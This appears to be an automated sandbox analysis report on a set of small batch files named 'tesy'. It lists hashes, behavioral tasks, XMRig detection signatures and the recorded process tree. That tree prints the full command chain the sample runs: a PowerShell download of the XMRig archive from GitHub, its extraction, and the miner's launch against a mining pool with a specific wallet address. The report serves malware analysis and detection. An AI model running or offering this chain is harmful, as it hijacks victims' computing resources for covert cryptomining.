Overview
overview
10Static
static
1tesy - Copy (10).bat
windows7-x64
10tesy - Copy (10).bat
windows10-2004-x64
10tesy - Copy (11).bat
windows7-x64
10tesy - Copy (11).bat
windows10-2004-x64
10tesy - Copy (12).bat
windows7-x64
10tesy - Copy (12).bat
windows10-2004-x64
10tesy - Copy (13).bat
windows7-x64
10tesy - Copy (13).bat
windows10-2004-x64
10tesy - Copy (14).bat
windows7-x64
10tesy - Copy (14).bat
windows10-2004-x64
10tesy - Copy (2).bat
windows7-x64
10tesy - Copy (2).bat
windows10-2004-x64
10tesy - Copy (3).bat
windows7-x64
10tesy - Copy (3).bat
windows10-2004-x64
10tesy - Copy (4).bat
windows7-x64
10tesy - Copy (4).bat
windows10-2004-x64
10tesy - Copy (5).bat
windows7-x64
10tesy - Copy (5).bat
windows10-2004-x64
10tesy - Copy (6).bat
windows7-x64
10tesy - Copy (6).bat
windows10-2004-x64
10tesy - Copy (7).bat
windows7-x64
10tesy - Copy (7).bat
windows10-2004-x64
10tesy - Copy (8).bat
windows7-x64
10tesy - Copy (8).bat
windows10-2004-x64
10tesy - Copy (9).bat
windows7-x64
10tesy - Copy (9).bat
windows10-2004-x64
10tesy - Copy.bat
windows7-x64
10tesy - Copy.bat
windows10-2004-x64
10tesy.bat
windows7-x64
10tesy.bat
windows10-2004-x64
10Analysis
-
max time kernel
0s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
22/12/2023, 10:03
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
tesy - Copy (10).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
tesy - Copy (11).bat
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
tesy - Copy (11).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
tesy - Copy (12).bat
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
tesy - Copy (12).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
tesy - Copy (13).bat
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
tesy - Copy (13).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
tesy - Copy (14).bat
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
tesy - Copy (14).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
tesy - Copy (2).bat
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
tesy - Copy (2).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
tesy - Copy (3).bat
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
tesy - Copy (3).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
tesy - Copy (4).bat
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
tesy - Copy (4).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
tesy - Copy (5).bat
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
tesy - Copy (5).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
tesy - Copy (6).bat
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
tesy - Copy (6).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
tesy - Copy (7).bat
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
tesy - Copy (7).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
tesy - Copy (8).bat
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
tesy - Copy (8).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
tesy - Copy (9).bat
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
tesy - Copy (9).bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
tesy - Copy.bat
Resource
win7-20231129-en
Behavioral task
behavioral28
Sample
tesy - Copy.bat
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
tesy.bat
Resource
win7-20231215-en
General
-
Target
tesy - Copy (4).bat
-
Size
608B
-
MD5
727c8da0478af118c957ae60f7161cab
-
SHA1
cf18105b8659e93bbd2824fa35ef1bae7b395301
-
SHA256
97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
-
SHA512
d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral16/files/0x0006000000023203-57.dat family_xmrig behavioral16/files/0x0006000000023203-57.dat xmrig behavioral16/memory/1808-60-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp xmrig behavioral16/memory/1808-63-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp xmrig behavioral16/memory/1808-64-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp xmrig behavioral16/memory/1808-65-0x00007FF6F68B0000-0x00007FF6F73B3000-memory.dmp xmrig -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 696 powershell.exe 696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 696 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3536 wrote to memory of 696 3536 cmd.exe 16 PID 3536 wrote to memory of 696 3536 cmd.exe 16
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (4).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"2⤵PID:2316
-
-
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exexmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b142⤵PID:1808
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
508KB
MD5f2ed335bb2c6212901e4a322655ab953
SHA17e1fb3a27cad5ce2938f4692a2d75fc0b4a149a3
SHA2560364eb2830294a21fe7c02f7cb1d4ec6dfa4ebdedfce90962fa5efaaacf562b8
SHA512b19a13caf6ca285313ee0517caca6876d1abc172942e25a5b267aa40e65b1ba07b074bb97d964655944f15c1316c3e41774089a1d2d9f16123023743f104db6e
-
Filesize
206KB
MD55fc3547f4e05dc2205b78c9f56391ac9
SHA1e0b840d09be154616ef087295e59984802b1c361
SHA25651761a0db91dfa73b199c4f0ebac7e0cfb329c29e83551d034c0d705d92d6fb9
SHA5121b5527c0d8fad387c68c9c4cafd4c1e182911fc2b2b3cb05e815baf08bb23846b43da5938222b405c2acee37a9363bdb1cac886b8eaf0e830b1c8caa6c535358